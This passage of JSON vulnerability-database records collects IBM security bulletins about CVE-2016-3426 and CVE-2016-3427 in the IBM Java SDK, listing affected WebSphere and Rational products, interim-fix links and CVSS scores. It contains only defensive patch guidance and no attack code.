- 4.0.7 \nRational Software Architect Design Manager 5.0 - 5.0.2 \nRational Software Architect Design Manager 6.0 - 6.0.2\n\n## Remediation/Fixes\n\nIf your product is deployed on WebSphere Application Server (WAS) and your deployment does not use an Eclipse based client nor the RM Browser plugin, then it is sufficient to continue using the existing version of the your Rational product, and only upgrade the JRE in the WAS server according to these instructions: \n[_ __Security Bulletin: __Multiple vulnerabilities in IBM\u00ae Java SDK affect WebSphere Application Server April 2016 CPU (CVE-2016-3426, CVE-2016-3427)_](<http://www.ibm.com/support/docview.wss?uid=swg21982223>) \n \n**Otherwise:** \n_Note: for any of the below remediations, if you are a WAS deployment, then WAS must also be upgraded, in addition to performing your product upgrades._ \nUpgrade your products to version **3.0.1.6 or 4.0.7** or **5.0.2** or **6.0.2**, apply the latest ifix, and then perform the following upgrades. Request the April 2016 CPU update for the IBM_\u00ae_ Java SDK: \n \n[_How to update the IBM SDK for Java of IBM Rational products based on version 3.0.1.6 or later of IBM's Jazz technology_](<http://www.ibm.com/support/docview.wss?uid=swg21674139>)\n\n * * For the 3.x releases of Rational Software Architect Design Manager and Rhapsody Design Manager, if you cannot upgrade to 4.0.7 or 5.0 or 6.0, contact [IBM Support](<http://www.ibm.com/software/support/einfo.html>) for guidance.\n * For the 2.x releases, contact [IBM Support](<http://www.ibm.com/software/support/einfo.html>) for additional details on the fix.\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.0, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-04-28T18:35:50", "type": "ibm", "title": "Security Bulletin: Vulnerability in IBM\u00ae Java SDK affects multiple IBM Rational products based on IBM Jazz technology (CVE-2016-3427)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3426", "CVE-2016-3427"], "modified": "2021-04-28T18:35:50", "id": "0D0755F0269505405CB64BD65BD409DF7890B56244501D37813BE723F406D6C1", "href": "https://www.ibm.com/support/pages/node/279971", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T17:45:57", "description": "## Summary\n\nWebSphere Application Server and IBM Tivoli Monitoring are shipped as components of IBM Service Delivery Manager. Information about a security vulnerability affecting WebSphere Application Server has been published in a security bulletin.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2016-3426_](<https://vulners.com/cve/CVE-2016-3426>)** \n****DESCRIPTION:** An unspecified vulnerability related to the JCE component could allow a remote attacker to obtain sensitive information resulting in a partial confidentiality impact using unknown attack vectors. \nCVSS Base Score: 4.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/112457_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/112457>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:P/I:N/A:N) \n\n**CVEID:** [_CVE-2016-3427_](<https://vulners.com/cve/CVE-2016-3427>)** \n****DESCRIPTION:** An unspecified vulnerability related to the JMX component has complete confidentiality impact, complete integrity impact, and complete availability impact. \nCVSS Base Score: 10 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/112459_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/112459>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C)\n\n## Affected Products and Versions\n\n**Principal Product and Version(s)**\n\n| **Affected Supporting Product and Version** \n---|--- \nIBM Service Delivery Manager version 7.2.1 through 7.2.4| IBM WebSphere Application Server version 7.0.0.0 through 7.0.0.27 \nIBM Tivoli Monitoring version 6.2.2 through 6.2.3 \n \n## Remediation/Fixes\n\n**Principal Product and Version(s)**\n\n| **Affected Supporting Product and Version**| **Affected Supporting Product Security Bulletin** \n---|---|--- \nIBM Service Delivery Manager version 7.2.1 through 7.2.4| IBM WebSphere Application Server version 7.0.0.0 through 7.0.0.27| Consult the security bulletin [_Multiple vulnerabilities in IBM\u00ae Java SDK affect WebSphere Application Server April 2016 CPU (CVE-2016-3426, CVE-2016-3427)_](<http://www-01.ibm.com/support/docview.wss?uid=swg21982223>) for fix information. \nIBM Service Delivery Manager version 7.2.1 through 7.2.4| IBM Tivoli Monitoring 6.2.2 through 6.2.3| Consult the security bulletin [_IBM Tivoli Monitoring embedded WebSphere Application Server (CVE-2016-3426, CVE-2016-3427)_](<http://www-01.ibm.com/support/docview.wss?uid=swg21984732>) for fix information. \n \n## ", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.0, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-06-17T22:33:13", "type": "ibm", "title": "Security Bulletin: Multiple security vulnerabilities have been identified in WebSphere Application Server and IBM Tivoli Monitoring shipped with IBM Service Delivery Manager (CVE-2016-3426, CVE-2016-3427)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3426", "CVE-2016-3427"], "modified": "2018-06-17T22:33:13", "id": "EC04C84423EE0C4E734038A3305029BA46FF47C7662107F5FFC07C3ACF2F1F61", "href": "https://www.ibm.com/support/pages/node/609253", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:54:37", "description": "## Summary\n\nWebSphere Application Server is shipped as a component of IBM Business Process Manager, WebSphere Process Server, and WebSphere Lombardi Edition. Information about a security vulnerability affecting WebSphere Application Server has been published in a security bulletin.\n\n## Vulnerability Details\n\nPlease consult the [Security Bulletin: Multiple vulnerabilities in IBM\u00ae Java SDK affect WebSphere Application Server April 2016 CPU (CVE-2016-3426, CVE-2016-3427)](<http://www.ibm.com/support/docview.wss?uid=swg21982223>) for vulnerability details and information about fixes.\n\n## Affected Products and Versions\n\n * * IBM Business Process Manager V7.5.x through V8.5.7.0 (including Process Federation Server on WebSphere Liberty Profile)\n * WebSphere Process Server V7.0.x\n * WebSphere Lombardi Edition V7.2.0.x\n \n \n_For__ earlier and unsupported versions of the products, IBM recommends upgrading to a fixed, supported version of the product._\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.0, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-06-15T07:05:34", "type": "ibm", "title": "Security Bulletin: Multiple vulnerabilities in WebSphere Application Server affect IBM Business Process Manager, WebSphere Process Server and WebSphere Lombardi Edition (Java CPU April 2016)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3426", "CVE-2016-3427"], "modified": "2018-06-15T07:05:34", "id": "E779812945D461E2AC5804611B54C4A491B1E4005572A27425DFC928CBC9BFC3", "href": "https://www.ibm.com/support/pages/node/278197", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:54:20", "description": "## Summary\n\nThere are multiple vulnerabilities in IBM\u00ae SDK Java\u2122 Technology Edition that is shipped with IBM WebSphere Application Server. These issues were disclosed in the Oracle April 2016 Critical Patch Update, plus four additional vulnerabilities. These may affect some configurations of IBM WebSphere Application Server Full Profile, IBM WebSphere Application Server Liberty Profile, and IBM WebSphere Application Server Hypervisor Edition. \n\n## Vulnerability Details\n\nThis bulletin covers all applicable Java SE CVEs published by Oracle as part of their April 2016 Critical Patch Update which affects IBM SDK, Java Technology Edition. There are other advisories included in the IBM Java SDK but WebSphere Application Server is not vulnerable to them. You will need to evaluate your own code to determine if you are vulnerable. Please refer to the Reference section for more information on the advisories not applicable to WebSphere Application Server. HP fixes are on a delayed schedule. \n \n \n**CVEID:** [_CVE-2016-3427_](<https://vulners.com/cve/CVE-2016-3427>)** \n****DESCRIPTION:** An unspecified vulnerability related to the JMX component has complete confidentiality impact, complete integrity impact, and complete availability impact. \nCVSS Base Score: 10 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/112459_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/112459>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n \n**CVEID:** [_CVE-2016-3426_](<https://vulners.com/cve/CVE-2016-3426>)** \n****DESCRIPTION:** An unspecified vulnerability related to the JCE component could allow a remote attacker to obtain sensitive information resulting in a partial confidentiality impact using unknown attack vectors. \nCVSS Base Score: 4.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/112457_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/112457>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:P/I:N/A:N) \n\n\n## Affected Products and Versions\n\nIBM Java SDK shipped with IBM WebSphere Application Server Version 8.5.0.0 through 8.5.5.9, Version 8.0.0.0 through 8.0.0.12, Version 7.0.0.0 through 7.0.0.41. \n\n * This _does not occur_ on IBM Java SDK shipped with WebSphere Application Servers Fix Packs 8.5.5.10, 8.0.0.13 and 7.0.0.43 or later. \n\n## Remediation/Fixes\n\nDownload and apply the interim fix APARs below, for your appropriate release \n** \nFor the IBM Java SDK updates: \nFor V8.5.0.0 through 8.5.5.9 WebSphere Application Server Liberty:** \nUpgrade to WebSphere Application Server Liberty Profile Fix Packs as noted below or later fix pack level and apply one of the interim fixes below: \n\n * Upgrade to WebSphere Application Server Liberty Profile Fix Pack 8.5.5.1 or later then apply Interim Fix [PI61189](<http://www-01.ibm.com/support/docview.wss?uid=swg24042122>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24041663>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24040429>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24040396>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24039956>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24039668>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24039304>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24038812>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24038093>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24037708>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24036967>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24036505>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24035398>)[](<http://www.ibm.com/support/docview.wss?uid=swg24034998>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24034447>): Will upgrade you to IBM SDK, Java Technology Edition, Version 6R1 Service Refresh 8 Fix Pack 25 (optional)\n * Upgrade to WebSphere Application Server Liberty Profile Fix Pack 8.5.5.1 or later then apply Interim Fix [PI61187](<http://www-01.ibm.com/support/docview.wss?uid=swg24042119>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24041669>): [](<http://www-01.ibm.com/support/docview.wss?uid=swg24041667>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24041197>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24040406>) [](<http://www-01.ibm.com/support/docview.wss?uid=swg24039958>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24039665>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24039312>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24038810>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24038089>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24036966>)[](<http://www.ibm.com/support/docview.wss?uid=swg24036508>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24035400>)[](<http://www.ibm.com/support/docview.wss?uid=swg24035008>)[](<http://www.ibm.com/support/docview.wss?uid=swg24034806>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24034592>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24037534>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24037709>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24036966>)[](<http://www.ibm.com/support/docview.wss?uid=swg24036508>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24035400>)[](<http://www.ibm.com/support/docview.wss?uid=swg24035008>)[](<http://www.ibm.com/support/docview.wss?uid=swg24034806>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24034592>)Will upgrade you to IBM SDK, Java Technology Edition, Version 7 Service Refresh 9 Fix Pack 40 (optional)\n * Upgrade to WebSphere Application Server Liberty Profile Fix Pack 8.5.5.2 or later then apply Interim Fix[ PI61186](<http://www-01.ibm.com/support/docview.wss?uid=swg24042118>): [](<http://www-01.ibm.com/support/docview.wss?uid=swg24040157>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24039961>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24039687>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24039311>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24038809>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24038165>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24036966>)[](<http://www.ibm.com/support/docview.wss?uid=swg24036508>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24035400>)[](<http://www.ibm.com/support/docview.wss?uid=swg24035008>)[](<http://www.ibm.com/support/docview.wss?uid=swg24034806>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24034592>)Will upgrade you to IBM SDK, Java Technology Edition, Version 7R1 Service Refresh 3[](<http://www-01.ibm.com/support/docview.wss?uid=swg24033359>) Fix Pack 40 (optional) \n * Upgrade to WebSphere Application Server Liberty Profile Fix Pack 8.5.5.1 or later then apply Interim Fix [PI61184](<http://www-01.ibm.com/support/docview.wss?uid=swg24042111>): [](<http://www-01.ibm.com/support/docview.wss?uid=swg24040158>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24039956>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24039668>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24039304>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24038812>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24038093>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24037708>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24036967>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24036505>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24035398>)[](<http://www.ibm.com/support/docview.wss?uid=swg24034998>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24034447>)Will upgrade you to IBM SDK, Java Technology Edition, Version 8 Service Refresh 3 (optional)\n * For a Liberty Archive Fix - Upgrade to WebSphere Application Server Liberty Profile Fix Pack 8.5.5.1 or later then apply Interim Fix[ PI61185](<http://www-01.ibm.com/support/docview.wss?uid=swg24042110>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24041192>): Will upgrade you to IBM SDK, Java Technology Edition, Version 8 Service Refresh 3 (optional) \n**\\--OR--**\n\n * Apply IBM Java SDK shipped with WebSphere Application Server Fix pack 10 (8.5.5.10) or later.\n \n** \nFor V8.5.0.0 through 8.5.5.9 WebSphere Application Server Full Profile and WebSphere Application Server Hypervisor Edition** **:**\n\nUpgrade to WebSphere Application Server Full Profile Fix Packs as noted below or later fix pack level and then apply one or more of the interim fixes below: \n\n * Upgrade to WebSphere Application Server Full Profile Fix Pack 8.5.5.1 or later then apply Interim Fix [PI61188](<http://www-01.ibm.com/support/docview.wss?uid=swg24042120>): [](<http://www-01.ibm.com/support/docview.wss?uid=swg24041658>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24041271>) [](<http://www-01.ibm.com/support/docview.wss?uid=swg24038091>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24036966>)[](<http://www.ibm.com/support/docview.wss?uid=swg24036508>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24035400>)[](<http://www.ibm.com/support/docview.wss?uid=swg24035008>)[](<http://www.ibm.com/support/docview.wss?uid=swg24034806>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24036965>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24036506>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24035399>)[](<http://www.ibm.com/support/docview.wss?uid=swg24034999>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24034798>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24034589>)Will upgrade you to IBM SDK, Java Technology Edition, Version 6R1 Service Refresh 8 Fix Pack 25 (required) \n * Upgrade to WebSphere Application Server Full Profile Fix Pack 8.5.5.1 or later then apply Interim Fix [PI61187](<http://www-01.ibm.com/support/docview.wss?uid=swg24042119>): [](<http://www-01.ibm.com/support/docview.wss?uid=swg24039958>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24039665>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24039312>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24038810>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24038089>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24036966>)[](<http://www.ibm.com/support/docview.wss?uid=swg24036508>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24035400>)[](<http://www.ibm.com/support/docview.wss?uid=swg24035008>)[](<http://www.ibm.com/support/docview.wss?uid=swg24034806>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24034592>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24037534>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24037709>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24036966>)[](<http://www.ibm.com/support/docview.wss?uid=swg24036508>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24035400>)[](<http://www.ibm.com/support/docview.wss?uid=swg24035008>)[](<http://www.ibm.com/support/docview.wss?uid=swg24034806>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24034592>)Will upgrade you to IBM SDK, Java Technology Edition, Version 7 Service Refresh 9 Fix Pack 40 (optional) \n * Upgrade to WebSphere Application Server Full Profile Fix Pack 8.5.5.2 or later then apply Interim Fix [PI61186](<http://www-01.ibm.com/support/docview.wss?uid=swg24042118>): [](<http://www-01.ibm.com/support/docview.wss?uid=swg24041671>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24041668>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24041194>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24040407>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24040157>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24039961>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24039687>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24039311>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24038809>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24038165>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24036966>)[](<http://www.ibm.com/support/docview.wss?uid=swg24036508>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24035400>)[](<http://www.ibm.com/support/docview.wss?uid=swg24035008>)[](<http://www.ibm.com/support/docview.wss?uid=swg24034806>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24034592>)Will upgrade you to IBM SDK, Java Technology Edition, Version 7R1 Service Refresh 3 Fix Pack 40[](<http://www-01.ibm.com/support/docview.wss?uid=swg24033359>) (optional)\n * Upgrade to WebSphere Application Server Full Profile Fix Pack 8.5.5.9 or later then apply Interim Fix [PI61184](<http://www-01.ibm.com/support/docview.wss?uid=swg24042111>): [](<http://www-01.ibm.com/support/docview.wss?uid=swg24040158>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24039956>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24039668>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24039304>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24038812>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24038093>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24037708>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24036967>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24036505>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24035398>)[](<http://www.ibm.com/support/docview.wss?uid=swg24034998>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24034447>)Will upgrade you to IBM SDK, Java Technology Edition, Version 8 Service Refresh 3 (optional)\n**\\--OR--**\n\n * Apply IBM Java SDK shipped with WebSphere Application Server Fix pack 10 (8.5.5.10) or later.\n** \n \nFor V8.0.0.0 through 8.0.0.12 WebSphere Application Server and WebSphere Application Server Hypervisor Edition:**\n\nUpgrade to WebSphere Application Server Fix Pack 8.0.0.7 or later then apply the interim fix below: \n\n * Apply Interim Fix[ PI61190](<http://www-01.ibm.com/support/docview.wss?uid=swg24042123>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24041659>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24041264>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24040409>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24040159>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24039956>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24039668>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24039304>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24038812>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24038093>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24037708>): [](<http://www-01.ibm.com/support/docview.wss?uid=swg24036967>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24036505>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24035398>)[](<http://www.ibm.com/support/docview.wss?uid=swg24034998>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24034447>)Will upgrade you to IBM SDK, Java Technology Edition, Version 6R1 Service Refresh 8 [](<http://www-01.ibm.com/support/docview.wss?uid=swg24033359>)Fix Pack 25\n**\\--OR--**\n\n * Apply IBM Java SDK shipped with WebSphere Application Server Fix pack 13 (8.0.0.13) or later.\n** \nFor V7.0.0.0 through 7.0.0.41 WebSphere Application Server and WebSphere Application Server Hypervisor Edition:**\n\nUpgrade to WebSphere Application Server Fix Pack 7.0.0.31 or later then apply the interim fix below: \n\n * Apply Interim Fix [PI61191](<http://www-01.ibm.com/support/docview.wss?uid=swg24042133>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24041265>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24040395>):[](<http://www-01.ibm.com/support/docview.wss?uid=swg24038816>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24038094>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24037515>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24036968>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24036504>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24035397>)[](<http://www.ibm.com/support/docview.wss?uid=swg24034997>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24034443>) Will upgrade you to IBM SDK, Java Technology Edition, Version 6 Service Refresh 16[](<http://www-01.ibm.com/support/docview.wss?uid=swg24033359>) Fix Pack 25\n**\\--OR--**\n\n * Apply IBM Java SDK shipped with WebSphere Application Server Fix pack 43 (7.0.0.43) or later.\n \nFor unsupported versions of the above products, IBM recommends upgrading to a fixed, supported version of the product. \n\n## Workarounds and Mitigations\n\nnone\n\n## ", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.0, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-06-15T07:05:33", "type": "ibm", "title": "Security Bulletin: Multiple vulnerabilities in IBM\u00ae Java SDK affect WebSphere Application Server April 2016 CPU (CVE-2016-3426, CVE-2016-3427)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3426", "CVE-2016-3427"], "modified": "2018-06-15T07:05:33", "id": "0E275DB0879F2F3FE93DB95B54E59F113110390231355F64AD1605244203F94C", "href": "https://www.ibm.com/support/pages/node/277661", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:40:10", "description": "## Summary\n\nIBM WebSphere Application Server is shipped as a component of IBM Rational ClearQuest. Information about a security vulnerability affecting WAS has been published in a security bulletin.\n\n## Vulnerability Details\n\nRefer to the bulletin \"[Security Bulletin: Multiple vulnerabilities in IBM\u00ae Java SDK affect WebSphere Application Server April 2016 CPU (CVE-2016-3426, CVE-2016-3427)](<http://www.ibm.com/support/docview.wss?uid=swg21982223>)\" for vulnerability details and information about fixes.\n\n## Affected Products and Versions\n\nIBM Rational ClearQuest, CQ Web Server, FTS Server, report launcher component. \n\n**Versions 8.0.0.x, 8.0.1.x, 9.0.0.x**\n\n**Versions 7.1.x.x**\n\n## Remediation/Fixes\n\nReview the security bulletin referenced above and apply the relevant fixes to your WAS installation used for ClearQuest. \n \n\n\n**Affected Versions**\n\n| \n\n** Applying the fix** \n \n---|--- \n7.1.0.x, 7.1.1.x, and 7.1.2.x| [Document 1390803](<http://www.ibm.com/support/docview.wss?uid=swg21390803>) explains how to update WebSphere Application Server for ClearQuest CM Servers at release 7.1.x. Consult those instructions when applying the fix. \n8.0.0.x \n8.0.1.x \n9.0.0.x| Apply the appropriate WebSphere Application Server fix directly to your ClearQuest server host. No ClearQuest-specific steps are necessary. \n_For 7.0.x, 7.1.x and earlier releases, IBM recommends upgrading to a fixed, supported version/release/platform of the product._\n\n## ", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.0, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-09-29T18:04:03", "type": "ibm", "title": "Security Bulletin: A security vulnerability has been identified in IBM WebSphere Application Server (WAS) shipped with IBM Rational ClearQuest (CVE-2016-3426, CVE-2016-3427)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": 